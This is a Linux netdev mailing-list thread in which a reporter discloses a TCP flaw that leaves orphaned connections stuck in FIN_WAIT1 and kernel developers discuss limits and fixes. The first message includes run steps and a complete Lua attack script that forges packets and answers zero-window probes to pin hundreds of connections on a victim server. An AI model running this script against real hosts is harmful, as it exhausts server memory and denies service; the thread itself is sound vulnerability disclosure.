All of lore.kernel.org
 help / color / mirror / Atom feed
* TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
@ 2014-09-15 16:11 Andrey Dmitrov
  2014-09-15 19:43 ` Neal Cardwell
  2014-09-15 23:15 ` Hannes Frederic Sowa
  0 siblings, 2 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-15 16:11 UTC (permalink / raw)
  To: netdev; +Cc: Alexandra N. Kossovsky, Konstantin Ushakov

[-- Attachment #1: Type: text/plain, Size: 2053 bytes --]

Greetings,

there is possible vulnerability in the TCP stack. Closing a socket after 
the TCP zero window advertising by peer leads to the socket stuck in 
FIN_WAIT1 state. FIN-ACK packet is not sent and not retransmitted. So 
the connection remains alive and without relation to any socket while 
the peer sends replies to the zero probe packets. It is possible to 
create a lot of connections in the same manner which will be in 
FIN_WAIT1 state forever.

Linux version 3.13-1-amd64 (debian-kernel@lists.debian.org) (gcc version 
4.8.2 (Debian 4.8.2-16) ) #1 SMP Debian 3.13.10-1 (2014-04-15)

I've written a script on Lua to reproduce this issue, find it in 
attachment please. I've used it with two hosts host_A (victim) and 
host_B (attacker), which are directly connected to each other. host_A 
has lighttpd installed and runned. Actually host_A can have any opened 
TCP listener socket to be attacked. If it closes any established with 
attacker connection it will stuck in the FIN_WAIT1 state. The script 
creates a number of TCP connections with the victim and sends replies 
for the zero window probe packets.

The test requires lua, tcpdump and nemesis on the host_B:
aptitude install lua5.1 lua5.1-posix nemesis tcpdump

How to run the test:
1. Run a httpd daemon on the host_A (I've used lighttpd).
2. Copy the test script attack.lua to the host_B.
3. Fill in the tested interfaces configuration (source, destination IP 
and MAC addresses) in the beginning of the file attack.lua. You can set 
maximum connections number in the variable *limit*, by default it is 500.
4. Set a fake MAC address for victim interface in host_B ARP table. It 
is to prevent host_B system replies (RST) receiving by the host_A:
     sudo arp -s <host_A IP addr> <any MAC address>
5. Run the test script on the host_B:
     sudo ./attack.lua

After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on 
the host_A:
netstat | grep FIN_WAIT1 | wc -l
500

Even if you close the http daemon the connections still will be alive.

Thanks,
Andrey Dmitrov

[-- Attachment #2: attack.lua --]
[-- Type: text/x-lua, Size: 3635 bytes --]

#!/usr/bin/lua

require("posix")
require("math")
require("os")

--~ Network configuration
--~ Source = attacker
--~ Destination = victim
local limit = 500 -- Maximum connections number
local iface = "eth3" -- Source (attacker) interface
local src_mac = "00:0f:53:01:39:94" -- Actual source interface MAC
local dst_mac = "00:0f:53:01:39:7c" -- Actual destination (victim) interface MAC
local src = "10.0.5.1" -- Source IP
local dst = "10.0.5.2" -- The destination IP
local dst_poprt = 80 -- The destination port

local nemesis = string.format("nemesis tcp -d %s -S %s -D %s -y %d -H %s -M %s",
                              iface, src, dst, dst_poprt, src_mac, dst_mac)


--~ Set fake MAC of the victim interface in the ARP table to prevent the attacker
--~ system replies receiving by the victim
--~ os.execute(string.format("arp -s %s 00:0c:29:c0:94:bf", dst))

math.randomseed(os.time())

function get_port(cs, idx)
  local port 
  local conn
  local i
  local ex

  repeat
    port = math.random(30000, 60000)
    ex = false

    for i, conn in pairs(cs) do
      if conn.port == port then
        ex = true
        break
      end
    end
  until not ex

  return port
end

function send_syn(conn, port, seqn)
  local cmd

  conn.port = port
  conn.seqn = (seqn + math.random(1000, 5000)) % 4294967295

  cmd = string.format("%s -fS -x %d -s %s -a 0 -w 29200 >/dev/null", nemesis,
                      conn.port, tostring(conn.seqn))
  print(cmd)
  os.execute(cmd)
  conn.seqn = conn.seqn + 1

  return seqn
end

function get_conn_by_port(cs, port)
  local i
  local conn

  for i, conn in pairs(cs) do
    if tonumber(conn.port) == tonumber(port) then
      return conn
    end
  end

  return nil
end

function send_ack(conn, packet, ackn)
  local win = 0

  if not ackn or not conn.seqn then
    return
  end

  conn.ackn = ackn
  cmd = string.format("%s -fA -x %d -s %s -a %s -w %d >/dev/null", nemesis,
                      conn.port, tostring(conn.seqn), tostring(ackn), win)
  print(cmd)
  os.execute(cmd)
end

function send_reply(cs, packet)
  local conn

  if not packet then
    return
  end

  conn = get_conn_by_port(cs, packet.src_port)
  if not conn then
    return
  end

  if packet.flags == "S." then
    send_ack(conn, packet, packet.seqn + 1)
  elseif packet.flags == "." then
    if packet.seqn == nil then
      packet.seqn = conn.ackn
    end
    send_ack(conn, packet, packet.seqn)
  end
end

function get_packet(line)
  local packet = {}
  local psrc
  local pdst

  if not line then
    return nil
  end

  --~ Skip unexpected and outgoing packets
  psrc = string.find(line, src)
  pdst = string.find(line, dst)
  if not pdst or not pdst or psrc < pdst then
    return nil
  end

  packet.src_port = line:match(src .. ".(%d+)")
  packet.dst_port = line:match(dst .. ".(%d+)")
  packet.flags = line:match("%[([%a,%.]+)%]")
  packet.seqn = line:match("seq (%d+)")
  packet.ackn = line:match("ack (%d+)")
  print(packet.src_port, packet.dst_port, packet.flags, packet.seqn, packet.ackn)

  return packet
end

function main_loop()
  local packet
  local cs = {}
  local idx = 0
  local f
  local seqn = 1971746917
  local prev_time = 0
  local curr_time

  f = io.popen("tcpdump -i " .. iface .. " -l -n tcp src port 80")

  while true do
    if idx < limit then
      curr_time = os.time()
      if curr_time ~= prev_time then
        prev_time = curr_time
        idx = idx + 1
        cs[idx] = {}
        cs[idx].idx = idx
        seqn = send_syn(cs[idx], get_port(cs, idx), seqn)
      end
    end

    packet = get_packet(f:read("*l"))
    send_reply(cs, packet)

  end

  io.close(f)
end

main_loop()

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 16:11 TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised Andrey Dmitrov
@ 2014-09-15 19:43 ` Neal Cardwell
  2014-09-16  9:29   ` Andrey Dmitrov
  2014-09-15 23:15 ` Hannes Frederic Sowa
  1 sibling, 1 reply; 14+ messages in thread
From: Neal Cardwell @ 2014-09-15 19:43 UTC (permalink / raw)
  To: Andrey Dmitrov; +Cc: Netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Mon, Sep 15, 2014 at 12:11 PM, Andrey Dmitrov
<andrey.dmitrov@oktetlabs.ru> wrote:
> It is possible to create a lot of connections in the same manner which will be in FIN_WAIT1 state forever.
...
> After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on the host_A:
> netstat | grep FIN_WAIT1 | wc -l
> 500

Thanks for the report. In your tests, have you ever seen the number of
such connections exceed net.ipv4.tcp_max_orphans?

Can you set net.ipv4.tcp_max_orphans to a low value and verify that it
limits the number of such connections? AFAICT it should.

thanks,
neal

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 16:11 TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised Andrey Dmitrov
  2014-09-15 19:43 ` Neal Cardwell
@ 2014-09-15 23:15 ` Hannes Frederic Sowa
  2014-09-15 23:37   ` Yuchung Cheng
                     ` (2 more replies)
  1 sibling, 3 replies; 14+ messages in thread
From: Hannes Frederic Sowa @ 2014-09-15 23:15 UTC (permalink / raw)
  To: Andrey Dmitrov; +Cc: netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Mo, 2014-09-15 at 20:11 +0400, Andrey Dmitrov wrote:
> Greetings,
> 
> there is possible vulnerability in the TCP stack. Closing a socket after 
> the TCP zero window advertising by peer leads to the socket stuck in 
> FIN_WAIT1 state. FIN-ACK packet is not sent and not retransmitted. So 
> the connection remains alive and without relation to any socket while 
> the peer sends replies to the zero probe packets. It is possible to 
> create a lot of connections in the same manner which will be in 
> FIN_WAIT1 state forever.
> 
> Linux version 3.13-1-amd64 (debian-kernel@lists.debian.org) (gcc version 
> 4.8.2 (Debian 4.8.2-16) ) #1 SMP Debian 3.13.10-1 (2014-04-15)
> 
> I've written a script on Lua to reproduce this issue, find it in 
> attachment please. I've used it with two hosts host_A (victim) and 
> host_B (attacker), which are directly connected to each other. host_A 
> has lighttpd installed and runned. Actually host_A can have any opened 
> TCP listener socket to be attacked. If it closes any established with 
> attacker connection it will stuck in the FIN_WAIT1 state. The script 
> creates a number of TCP connections with the victim and sends replies 
> for the zero window probe packets.
> 
> The test requires lua, tcpdump and nemesis on the host_B:
> aptitude install lua5.1 lua5.1-posix nemesis tcpdump
> 
> How to run the test:
> 1. Run a httpd daemon on the host_A (I've used lighttpd).
> 2. Copy the test script attack.lua to the host_B.
> 3. Fill in the tested interfaces configuration (source, destination IP 
> and MAC addresses) in the beginning of the file attack.lua. You can set 
> maximum connections number in the variable *limit*, by default it is 500.
> 4. Set a fake MAC address for victim interface in host_B ARP table. It 
> is to prevent host_B system replies (RST) receiving by the host_A:
>      sudo arp -s <host_A IP addr> <any MAC address>
> 5. Run the test script on the host_B:
>      sudo ./attack.lua
> 
> After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on 
> the host_A:
> netstat | grep FIN_WAIT1 | wc -l
> 500
> 
> Even if you close the http daemon the connections still will be alive.

Also thanks for the report.

Do you see any tcp window repair messages in dmesg? Can you send some
output of ss -oemit state FIN-WAIT-1 from the target host?

I thought they should timeout after RTO_MAX (~2 minutes).

Thanks,
Hannes

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:15 ` Hannes Frederic Sowa
@ 2014-09-15 23:37   ` Yuchung Cheng
  2014-09-16 12:49     ` Andrey Dmitrov
  2014-09-16  1:50   ` Eric Dumazet
  2014-09-16 12:47   ` Andrey Dmitrov
  2 siblings, 1 reply; 14+ messages in thread
From: Yuchung Cheng @ 2014-09-15 23:37 UTC (permalink / raw)
  To: Hannes Frederic Sowa
  Cc: Andrey Dmitrov, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Mon, Sep 15, 2014 at 4:15 PM, Hannes Frederic Sowa
<hannes@stressinduktion.org> wrote:
> On Mo, 2014-09-15 at 20:11 +0400, Andrey Dmitrov wrote:
>> Greetings,
>>
>> there is possible vulnerability in the TCP stack. Closing a socket after
>> the TCP zero window advertising by peer leads to the socket stuck in
>> FIN_WAIT1 state. FIN-ACK packet is not sent and not retransmitted. So
>> the connection remains alive and without relation to any socket while
>> the peer sends replies to the zero probe packets. It is possible to
>> create a lot of connections in the same manner which will be in
>> FIN_WAIT1 state forever.
>>
>> Linux version 3.13-1-amd64 (debian-kernel@lists.debian.org) (gcc version
>> 4.8.2 (Debian 4.8.2-16) ) #1 SMP Debian 3.13.10-1 (2014-04-15)
>>
>> I've written a script on Lua to reproduce this issue, find it in
>> attachment please. I've used it with two hosts host_A (victim) and
>> host_B (attacker), which are directly connected to each other. host_A
>> has lighttpd installed and runned. Actually host_A can have any opened
>> TCP listener socket to be attacked. If it closes any established with
>> attacker connection it will stuck in the FIN_WAIT1 state. The script
>> creates a number of TCP connections with the victim and sends replies
>> for the zero window probe packets.
>>
>> The test requires lua, tcpdump and nemesis on the host_B:
>> aptitude install lua5.1 lua5.1-posix nemesis tcpdump
>>
>> How to run the test:
>> 1. Run a httpd daemon on the host_A (I've used lighttpd).
>> 2. Copy the test script attack.lua to the host_B.
>> 3. Fill in the tested interfaces configuration (source, destination IP
>> and MAC addresses) in the beginning of the file attack.lua. You can set
>> maximum connections number in the variable *limit*, by default it is 500.
>> 4. Set a fake MAC address for victim interface in host_B ARP table. It
>> is to prevent host_B system replies (RST) receiving by the host_A:
>>      sudo arp -s <host_A IP addr> <any MAC address>
>> 5. Run the test script on the host_B:
>>      sudo ./attack.lua
>>
>> After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on
>> the host_A:
>> netstat | grep FIN_WAIT1 | wc -l
>> 500
>>
>> Even if you close the http daemon the connections still will be alive.
>
> Also thanks for the report.
>
> Do you see any tcp window repair messages in dmesg? Can you send some
> output of ss -oemit state FIN-WAIT-1 from the target host?
>
> I thought they should timeout after RTO_MAX (~2 minutes).
I think the vulnerability comes from the peer/attacker actually
responds to the probes to evade the orphan counts or memory checks in
tcp_probe_timer(). This is a gray area of being legit but suspiciously
mis-behaving?
maybe have socket option TCP_USER_TIMEOUT for apps to cover conditions
like these.

>
> Thanks,
> Hannes
>
>
> --
> To unsubscribe from this list: send the line "unsubscribe netdev" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:15 ` Hannes Frederic Sowa
  2014-09-15 23:37   ` Yuchung Cheng
@ 2014-09-16  1:50   ` Eric Dumazet
  2014-09-16  8:37     ` Hannes Frederic Sowa
  2014-09-16 12:47   ` Andrey Dmitrov
  2 siblings, 1 reply; 14+ messages in thread
From: Eric Dumazet @ 2014-09-16  1:50 UTC (permalink / raw)
  To: Hannes Frederic Sowa
  Cc: Andrey Dmitrov, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, 2014-09-16 at 01:15 +0200, Hannes Frederic Sowa wrote:
> On Mo, 2014-09-15 at 20:11 +0400, Andrey Dmitrov wrote:
> > Greetings,
> > 
> > there is possible vulnerability in the TCP stack. Closing a socket after 
> > the TCP zero window advertising by peer leads to the socket stuck in 
> > FIN_WAIT1 state. FIN-ACK packet is not sent and not retransmitted. So 
> > the connection remains alive and without relation to any socket while 
> > the peer sends replies to the zero probe packets. It is possible to 
> > create a lot of connections in the same manner which will be in 
> > FIN_WAIT1 state forever.
> > 
> > Linux version 3.13-1-amd64 (debian-kernel@lists.debian.org) (gcc version 
> > 4.8.2 (Debian 4.8.2-16) ) #1 SMP Debian 3.13.10-1 (2014-04-15)
> > 
> > I've written a script on Lua to reproduce this issue, find it in 
> > attachment please. I've used it with two hosts host_A (victim) and 
> > host_B (attacker), which are directly connected to each other. host_A 
> > has lighttpd installed and runned. Actually host_A can have any opened 
> > TCP listener socket to be attacked. If it closes any established with 
> > attacker connection it will stuck in the FIN_WAIT1 state. The script 
> > creates a number of TCP connections with the victim and sends replies 
> > for the zero window probe packets.
> > 
> > The test requires lua, tcpdump and nemesis on the host_B:
> > aptitude install lua5.1 lua5.1-posix nemesis tcpdump
> > 
> > How to run the test:
> > 1. Run a httpd daemon on the host_A (I've used lighttpd).
> > 2. Copy the test script attack.lua to the host_B.
> > 3. Fill in the tested interfaces configuration (source, destination IP 
> > and MAC addresses) in the beginning of the file attack.lua. You can set 
> > maximum connections number in the variable *limit*, by default it is 500.
> > 4. Set a fake MAC address for victim interface in host_B ARP table. It 
> > is to prevent host_B system replies (RST) receiving by the host_A:
> >      sudo arp -s <host_A IP addr> <any MAC address>
> > 5. Run the test script on the host_B:
> >      sudo ./attack.lua
> > 
> > After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on 
> > the host_A:
> > netstat | grep FIN_WAIT1 | wc -l
> > 500
> > 
> > Even if you close the http daemon the connections still will be alive.
> 
> Also thanks for the report.
> 
> Do you see any tcp window repair messages in dmesg? Can you send some
> output of ss -oemit state FIN-WAIT-1 from the target host?
> 
> I thought they should timeout after RTO_MAX (~2 minutes).


Why ? If a TARPIT module always answer to zero window probes, these
sessions would last forever.

This is a rather old problem ;)

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16  1:50   ` Eric Dumazet
@ 2014-09-16  8:37     ` Hannes Frederic Sowa
  0 siblings, 0 replies; 14+ messages in thread
From: Hannes Frederic Sowa @ 2014-09-16  8:37 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Andrey Dmitrov, netdev, Alexandra N. Kossovsky, Konstantin Ushakov



On Tue, Sep 16, 2014, at 03:50, Eric Dumazet wrote:
> 
> Why ? If a TARPIT module always answer to zero window probes, these
> sessions would last forever.

The first paragraph from the original mail didn't read like it would
constantly answer to the zero win probes, but after looking at the
attack.lua source I come to the same conclusion.

Bye,
Hannes

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 19:43 ` Neal Cardwell
@ 2014-09-16  9:29   ` Andrey Dmitrov
  0 siblings, 0 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16  9:29 UTC (permalink / raw)
  To: Neal Cardwell; +Cc: Netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 15/09/14 23:43, Neal Cardwell wrote:
> On Mon, Sep 15, 2014 at 12:11 PM, Andrey Dmitrov
> <andrey.dmitrov@oktetlabs.ru> wrote:
>> It is possible to create a lot of connections in the same manner which will be in FIN_WAIT1 state forever.
> ...
>> After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on the host_A:
>> netstat | grep FIN_WAIT1 | wc -l
>> 500
> Thanks for the report. In your tests, have you ever seen the number of
> such connections exceed net.ipv4.tcp_max_orphans?
>
> Can you set net.ipv4.tcp_max_orphans to a low value and verify that it
> limits the number of such connections? AFAICT it should.
I tried to set net.ipv4.tcp_max_orphans to 100, it limits the 
connections number. As I saw net.ipv4.tcp_max_orphans can be exceeded, 
but for a short time. Maximum connections number in FIN_WAIT1 state was 
196, after that it was decreased rather fast to ~100.

Thanks,
Andrey

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:15 ` Hannes Frederic Sowa
  2014-09-15 23:37   ` Yuchung Cheng
  2014-09-16  1:50   ` Eric Dumazet
@ 2014-09-16 12:47   ` Andrey Dmitrov
  2014-09-16 13:09     ` Eric Dumazet
  2 siblings, 1 reply; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16 12:47 UTC (permalink / raw)
  To: Hannes Frederic Sowa; +Cc: netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 16/09/14 03:15, Hannes Frederic Sowa wrote:
> Also thanks for the report.
>
> Do you see any tcp window repair messages in dmesg? Can you send some
> output of ss -oemit state FIN-WAIT-1 from the target host?
Hannes,
no, there aren't any messages in dmesg until net.ipv4.tcp_max_orphans is 
achieved.

# ss -oemit state FIN-WAIT-1
0 1 10.0.5.2:http 10.0.5.1:35973    timer:(persist,23sec,0) ino:0 
sk:ffff880226756140 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic 
mss:536 cwnd:10 retrans:0/1 rcv_space:29200
0 1 10.0.5.2:http 10.0.5.1:35320    timer:(persist,26sec,0) ino:0 
sk:ffff88020b5cf180 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic 
rto:2964 rtt:988/494 mss:536 cwnd:10 send 43.4Kbps rcv_space:29200
0 1 10.0.5.2:http 10.0.5.1:56784    timer:(persist,20sec,0) ino:0 
sk:ffff88022543e800 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic 
rto:2964 rtt:988/494 mss:536 cwnd:10 send 43.4Kbps rcv_space:29200
0 1 10.0.5.2:http 10.0.5.1:45866    timer:(persist,22sec,0) ino:0 
sk:ffff88020b9d3140 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic 
rto:2952 rtt:984/492 mss:536 cwnd:10 send 43.6Kbps rcv_space:29200

Thanks,
Andrey

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:37   ` Yuchung Cheng
@ 2014-09-16 12:49     ` Andrey Dmitrov
  0 siblings, 0 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16 12:49 UTC (permalink / raw)
  To: Yuchung Cheng, Hannes Frederic Sowa
  Cc: netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 16/09/14 03:37, Yuchung Cheng wrote:
> I think the vulnerability comes from the peer/attacker actually
> responds to the probes to evade the orphan counts or memory checks in
> tcp_probe_timer(). This is a gray area of being legit but suspiciously
> mis-behaving?
> maybe have socket option TCP_USER_TIMEOUT for apps to cover conditions
> like these.
Yuchung,
I've tried to use socket option TCP_USER_TIMEOUT, but unfortunately it 
does not help here. I think it is because all packets get their 
acknowledges.

To everybody,
As I understand there is a sensitive difference in the connection 
behavior when the zero window is advertised. In this case there is no 
warranty that after socket closing the connection will be actually 
closed in a finite time. And probably this cannot be regulated at the 
moment. On the other hand if the zero window was not advertised, user 
can be sure that the connection is closed in a finite time despite on 
any peer actions. Moreover user can configure this time with the 
corresponding timeouts. I.e. a user has a lot of options to configure 
different timeouts, but in fact despite on his actions he has no 
guarantee that the connection will be closed at all.

Thanks,
Andrey

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 12:47   ` Andrey Dmitrov
@ 2014-09-16 13:09     ` Eric Dumazet
  2014-09-16 14:08       ` Andrey Dmitrov
  2014-09-16 15:11       ` Yuchung Cheng
  0 siblings, 2 replies; 14+ messages in thread
From: Eric Dumazet @ 2014-09-16 13:09 UTC (permalink / raw)
  To: Andrey Dmitrov
  Cc: Hannes Frederic Sowa, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, 2014-09-16 at 16:47 +0400, Andrey Dmitrov wrote:
> On 16/09/14 03:15, Hannes Frederic Sowa wrote:
> > Also thanks for the report.
> >
> > Do you see any tcp window repair messages in dmesg? Can you send some
> > output of ss -oemit state FIN-WAIT-1 from the target host?
> Hannes,
> no, there aren't any messages in dmesg until net.ipv4.tcp_max_orphans is 
> achieved.


Andrey, you should take a look at Labrea Tarpit,

http://www.sans.org/reading-room/whitepapers/casestudies/smart-ids-hybrid-labrea-tarpit-33254

What happens is the following :

A normal TCP session is established, traffic is sent from server to
client.

Client sends a zero window.

1) This can be normal, because application reading client queue no
longer can. (For example its a ssh session, and output to the terminal
is blocked by CTRL S). There are valid cases when you block this for
many hours.

2) This can be faked by malicious peer, willing to make server enter
this mode (inability to send more data, data stack in output queue, one
probe sent every RTO). This is a very well known way to let servers
consume a lot of kernel memory and eventually OOM.


Then server sends a probe every RTO, and client responds with a ACK with
win=0

TCP specs say : This can last forever, even if socket is eventually
closed by the server (because he gave up) and enters FIN_WAIT

Supposedly, if a server is about to give up, it might tell the TCP
stack : Oh, do not bother absolutely sending the remaining bytes you
have in output queue (I, the application, already waited for a very
reasonable time)

Normally SO_LINGER could be used, or TCP_USER_TIMEOUT. This requires a
system call before doing the close().

1) TCP_USER_TIMEOUT would be the fit for this, but its current
implementation do not take care of the probes sent, even in FIN_WAIT
state when in this zero window mode. A patch would be needed.

2) SO_LINGER, timeout=0 might work.

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 13:09     ` Eric Dumazet
@ 2014-09-16 14:08       ` Andrey Dmitrov
  2014-09-16 15:11       ` Yuchung Cheng
  1 sibling, 0 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16 14:08 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Hannes Frederic Sowa, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 16/09/14 17:09, Eric Dumazet wrote:
> 1) TCP_USER_TIMEOUT would be the fit for this, but its current
> implementation do not take care of the probes sent, even in FIN_WAIT
> state when in this zero window mode. A patch would be needed.
>
> 2) SO_LINGER, timeout=0 might work.
I tried to set SO_LINGER with non-zero timeout before reporting the bug, 
it did not help. But I've just tried again with the zero timeout 
(l_linger=0) and it works, the connection has been interrupted 
immediately after socket closing, RST packet has been sent. It seems 
like a bug, SO_LINGER with non-zero timeout does not interrupt the 
connection.

Thanks,
Andrey

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 13:09     ` Eric Dumazet
  2014-09-16 14:08       ` Andrey Dmitrov
@ 2014-09-16 15:11       ` Yuchung Cheng
  2014-09-16 16:31         ` Neal Cardwell
  1 sibling, 1 reply; 14+ messages in thread
From: Yuchung Cheng @ 2014-09-16 15:11 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Andrey Dmitrov, Hannes Frederic Sowa, netdev,
	Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, Sep 16, 2014 at 6:09 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> On Tue, 2014-09-16 at 16:47 +0400, Andrey Dmitrov wrote:
>> On 16/09/14 03:15, Hannes Frederic Sowa wrote:
>> > Also thanks for the report.
>> >
>> > Do you see any tcp window repair messages in dmesg? Can you send some
>> > output of ss -oemit state FIN-WAIT-1 from the target host?
>> Hannes,
>> no, there aren't any messages in dmesg until net.ipv4.tcp_max_orphans is
>> achieved.
>
>
> Andrey, you should take a look at Labrea Tarpit,
>
> http://www.sans.org/reading-room/whitepapers/casestudies/smart-ids-hybrid-labrea-tarpit-33254
>
> What happens is the following :
>
> A normal TCP session is established, traffic is sent from server to
> client.
>
> Client sends a zero window.
>
> 1) This can be normal, because application reading client queue no
> longer can. (For example its a ssh session, and output to the terminal
> is blocked by CTRL S). There are valid cases when you block this for
> many hours.
>
> 2) This can be faked by malicious peer, willing to make server enter
> this mode (inability to send more data, data stack in output queue, one
> probe sent every RTO). This is a very well known way to let servers
> consume a lot of kernel memory and eventually OOM.
>
>
> Then server sends a probe every RTO, and client responds with a ACK with
> win=0
>
> TCP specs say : This can last forever, even if socket is eventually
> closed by the server (because he gave up) and enters FIN_WAIT
>
> Supposedly, if a server is about to give up, it might tell the TCP
> stack : Oh, do not bother absolutely sending the remaining bytes you
> have in output queue (I, the application, already waited for a very
> reasonable time)
>
> Normally SO_LINGER could be used, or TCP_USER_TIMEOUT. This requires a
> system call before doing the close().
>
> 1) TCP_USER_TIMEOUT would be the fit for this, but its current
> implementation do not take care of the probes sent, even in FIN_WAIT
> state when in this zero window mode. A patch would be needed.
Yes that's what I meant. I am proposing we should patch
TCP_USER_TIMEOUT to do this.


>
> 2) SO_LINGER, timeout=0 might work.
>
>
>
> --
> To unsubscribe from this list: send the line "unsubscribe netdev" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 15:11       ` Yuchung Cheng
@ 2014-09-16 16:31         ` Neal Cardwell
  2014-09-16 17:04           ` Eric Dumazet
  0 siblings, 1 reply; 14+ messages in thread
From: Neal Cardwell @ 2014-09-16 16:31 UTC (permalink / raw)
  To: Yuchung Cheng
  Cc: Eric Dumazet, Andrey Dmitrov, Hannes Frederic Sowa, netdev,
	Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, Sep 16, 2014 at 11:11 AM, Yuchung Cheng <ycheng@google.com> wrote:
> On Tue, Sep 16, 2014 at 6:09 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
>> Normally SO_LINGER could be used, or TCP_USER_TIMEOUT. This requires a
>> system call before doing the close().
>>
>> 1) TCP_USER_TIMEOUT would be the fit for this, but its current
>> implementation do not take care of the probes sent, even in FIN_WAIT
>> state when in this zero window mode. A patch would be needed.
> Yes that's what I meant. I am proposing we should patch
> TCP_USER_TIMEOUT to do this.

We should probably be careful here. It would be a non-trivial change
in semantics to have TCP_USER_TIMEOUT solve this issue.

TCP_USER_TIMEOUT, in both the man page, the RFC, and the existing
code, is about a user-specific limit on the maximum amount of time the
TCP stack will attempt to transmit a single packet. (For example, the
man page: "specifies the maximum amount of time in milliseconds that
transmitted data may remain unacknowledged before TCP will forcibly
close the corresponding connection"). Any existing apps that are
setting TCP_USER_TIMEOUT are probably setting it to something in the
range of seconds to a few minutes, and may reasonably expect their
orphaned connections to last minutes to hours, as long as they are
making progress (each of the packets is ACKed in the
seconds-to-minutes range).

By contrast, AFAICT what we are talking about here for these
ZWP-forever/tarpit scenarios is to be able to cap the maximum overall
lifetime of an orphan connection. That's a different parameter, and
folks might want to set it in the minutes-to-hours range.

neal

^ permalink raw reply	[flat|nested] 14+ messages in thread

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 16:31         ` Neal Cardwell
@ 2014-09-16 17:04           ` Eric Dumazet
  0 siblings, 0 replies; 14+ messages in thread
From: Eric Dumazet @ 2014-09-16 17:04 UTC (permalink / raw)
  To: Neal Cardwell
  Cc: Yuchung Cheng, Andrey Dmitrov, Hannes Frederic Sowa, netdev,
	Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, 2014-09-16 at 12:31 -0400, Neal Cardwell wrote:
> On Tue, Sep 16, 2014 at 11:11 AM, Yuchung Cheng <ycheng@google.com> wrote:
> > On Tue, Sep 16, 2014 at 6:09 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> >> Normally SO_LINGER could be used, or TCP_USER_TIMEOUT. This requires a
> >> system call before doing the close().
> >>
> >> 1) TCP_USER_TIMEOUT would be the fit for this, but its current
> >> implementation do not take care of the probes sent, even in FIN_WAIT
> >> state when in this zero window mode. A patch would be needed.
> > Yes that's what I meant. I am proposing we should patch
> > TCP_USER_TIMEOUT to do this.
> 
> We should probably be careful here. It would be a non-trivial change
> in semantics to have TCP_USER_TIMEOUT solve this issue.
> 
> TCP_USER_TIMEOUT, in both the man page, the RFC, and the existing
> code, is about a user-specific limit on the maximum amount of time the
> TCP stack will attempt to transmit a single packet. (For example, the
> man page: "specifies the maximum amount of time in milliseconds that
> transmitted data may remain unacknowledged before TCP will forcibly
> close the corresponding connection"). Any existing apps that are
> setting TCP_USER_TIMEOUT are probably setting it to something in the
> range of seconds to a few minutes, and may reasonably expect their
> orphaned connections to last minutes to hours, as long as they are
> making progress (each of the packets is ACKed in the
